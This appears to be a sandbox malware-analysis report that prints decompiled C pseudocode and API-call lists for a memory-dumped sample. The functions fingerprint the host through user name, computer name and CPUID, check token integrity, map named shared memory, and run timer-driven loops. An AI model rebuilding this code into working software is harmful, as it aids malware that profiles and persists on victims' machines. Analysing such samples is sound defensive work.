                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x47fd238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x47fd238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E047F518F(GetTickCount());
                                                          					_t82 =  *0x47fd32c; // 0x52e95b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x47fd32c; // 0x52e95b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x47fd32c; // 0x52e95b0
                                                          					_t148 = E047F1BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x47fd238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x47fc28c);
                                                          					_push(_t148);
                                                          					_t94 = E047F361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x47fd238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E047F9070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E047F6761();
                                                          						L22:
                                                          						HeapFree( *0x47fd238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E047F69B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E047F391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E047FA734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E047F5800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E047FA734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F4ACA
                                                          • wsprintfA.USER32 ref: 047F4B1A
                                                          • wsprintfA.USER32 ref: 047F4B37
                                                          • wsprintfA.USER32 ref: 047F4B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4B75
                                                          • wsprintfA.USER32 ref: 047F4B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F4BD4
                                                          • GetTickCount.KERNEL32 ref: 047F4BE5
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F4BF9
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F4C17
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047F1BB6: strcpy.NTDLL ref: 047F1C00
                                                            • Part of subcall function 047F1BB6: lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                          • StrTrimA.SHLWAPI(00000000,047FC28C,?,052E95B0), ref: 047F4C4E
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047F361A: lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                            • Part of subcall function 047F361A: lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 047F4C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 047F4C77
                                                          • lstrcat.KERNEL32(?,?), ref: 047F4C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 047F4C8B
                                                            • Part of subcall function 047F9070: lstrlen.KERNEL32(?,00000000,052E9A98,00000000,047F8808,052E9C76,?,?,?,?,?,63699BC3,00000005,047FD00C), ref: 047F9077
                                                            • Part of subcall function 047F9070: mbstowcs.NTDLL ref: 047F90A0
                                                            • Part of subcall function 047F9070: memset.NTDLL ref: 047F90B2
                                                          • wcstombs.NTDLL ref: 047F4D1C
                                                            • Part of subcall function 047F391F: SysAllocString.OLEAUT32(?), ref: 047F395A
                                                            • Part of subcall function 047F391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 047F39DD
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 047F4D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047F4D69
                                                          • HeapFree.KERNEL32(00000000,?,?,052E95B0), ref: 047F4D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F4D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 047F4D8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E047F51B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x47fd240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L047FAF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x47fd26c; // 0x2c8
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x47fd24c = 5;
                                                          						} else {
                                                          							_t68 = E047F8D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x47fd260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E047FA376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E047F36B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x47fd244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x47fd248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E047F6761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x47fd248);
                                                          								L21:
                                                          								L047FAF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x47fd238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 047F51C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047F51D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047F51F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 047F5212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047F522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F52C1
                                                          • CloseHandle.KERNEL32(?), ref: 047F52D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047F530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,047F5D5E,?), ref: 047F5320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047F532B
                                                            • Part of subcall function 047F8D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052E9368,00000000,?,74B5F710,00000000,74B5F730), ref: 047F8D63
                                                            • Part of subcall function 047F8D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052E93A0,?,00000000,30314549,00000014,004F0053,052E935C), ref: 047F8E00
                                                            • Part of subcall function 047F8D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047F523E), ref: 047F8E12
                                                          • GetLastError.KERNEL32 ref: 047F533D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 3da0a6719b8f373e4b197f716edcaac3b0a56b8add96614c2952bb59b7ff031a
                                                          • Instruction ID: 6a1bfbdaf6d142dd8cb643da091ef4712565a441ac56035515f349ccdbcc938b
                                                          • Opcode Fuzzy Hash: 3da0a6719b8f373e4b197f716edcaac3b0a56b8add96614c2952bb59b7ff031a
                                                          • Instruction Fuzzy Hash: 82517FB1905228BFDF119FD5DD48DEEBFB8EF09724F204615E911A2341D774AA40DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E047F232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L047FAF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t5 = _t13 + 0x47fe87e; // 0x52e8e26
                                                          				_t6 = _t13 + 0x47fe59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L047FABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x47fd2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53,?,?), ref: 047F233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047F2351
                                                          • _snwprintf.NTDLL ref: 047F2376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,047FD2AC,00000004,00000000,00001000,?), ref: 047F2392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53), ref: 047F23A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 047F23BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?), ref: 047F23DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53), ref: 047F23E4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 1f58cff969713dde1fcdbe8f881b29584489b8f92aa829d5c36cd0bd23890584
                                                          • Instruction ID: 33f78b742033f280ff9927a63988c2f887682bca1090e45f2cf849b1ab1c37c9
                                                          • Opcode Fuzzy Hash: 1f58cff969713dde1fcdbe8f881b29584489b8f92aa829d5c36cd0bd23890584
                                                          • Instruction Fuzzy Hash: 2821C0B2600208BFD721ABA8DC45FCE77A9EF48710F104561FB05E7391E675E909CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E047F9135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x47fd270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E047FA6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x47fd2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x47fd238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E047F7306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x47fd238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x47fd238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047F7306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x47fd238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047F916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047F9183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047F9190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,047F5D20), ref: 047F91B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047F91D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047F91EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047F91F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,047F5D20), ref: 047F9217
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: a1952732d2151e75222c6550529bad47fd1e2f32418ffda365759baaf0e7bb6c
                                                          • Instruction ID: f3d870f5ee2e601fb2e8d11d39c9bea2855725e9796d3e949e3bc15365289fc8
                                                          • Opcode Fuzzy Hash: a1952732d2151e75222c6550529bad47fd1e2f32418ffda365759baaf0e7bb6c
                                                          • Instruction Fuzzy Hash: 4031F8B1A00209EFEB21DFA9DD84BAEB7F9EF44214B118469EA05D7310D774EE419B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F1A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x47fd25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E047FA71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E047FA734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047F1A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047F1A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047F1A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 047F1ABA
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047F1A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047F1A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047F1AA5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: bafd4d6da3361889883e01d510f66990c8c978a1aaa6820e65a6df564aaba5ac
                                                          • Instruction ID: 55f880bf60a14d38dc8a60a79c19ef9468002840017e0133df1f8af6f1a2533c
                                                          • Opcode Fuzzy Hash: bafd4d6da3361889883e01d510f66990c8c978a1aaa6820e65a6df564aaba5ac
                                                          • Instruction Fuzzy Hash: DA215975900248FFEB11DFA4DC84EEEBBB9EB08304F0041A6EA01A6390C7759E05EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 047F395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 047F39DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 047F3A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3A3F
                                                            • Part of subcall function 047F6F3A: SysAllocString.OLEAUT32(047FC290), ref: 047F6F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 047F3A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3AA1
                                                            • Part of subcall function 047F1AE2: Sleep.KERNELBASE(000001F4), ref: 047F1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: b020de7f0be7e7b165c8605721512eedc7adf18cee86d3fed18ee0945db0f593
                                                          • Instruction ID: 0d4f17fca3bf961f318bfaf8dcfd31950072dbcffac65cbc212825fe48f9f544
                                                          • Opcode Fuzzy Hash: b020de7f0be7e7b165c8605721512eedc7adf18cee86d3fed18ee0945db0f593
                                                          • Instruction Fuzzy Hash: C1513C75500609AFDB11CFA9C848A9EB7B6FF88744F148829EA05DB324EB35ED06CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E047F12E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x47fd238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x47fd1a8 = GetTickCount();
                                                          					_t12 = E047F3E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L047FB08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E047F5548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E047F4DA2(_t25) != 0) {
                                                          							 *0x47fd260 = 1; // executed
                                                          						}
                                                          						_t12 = E047F5BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F12F8
                                                          • GetTickCount.KERNEL32 ref: 047F130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,047F4EF2,?), ref: 047F1328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F132E
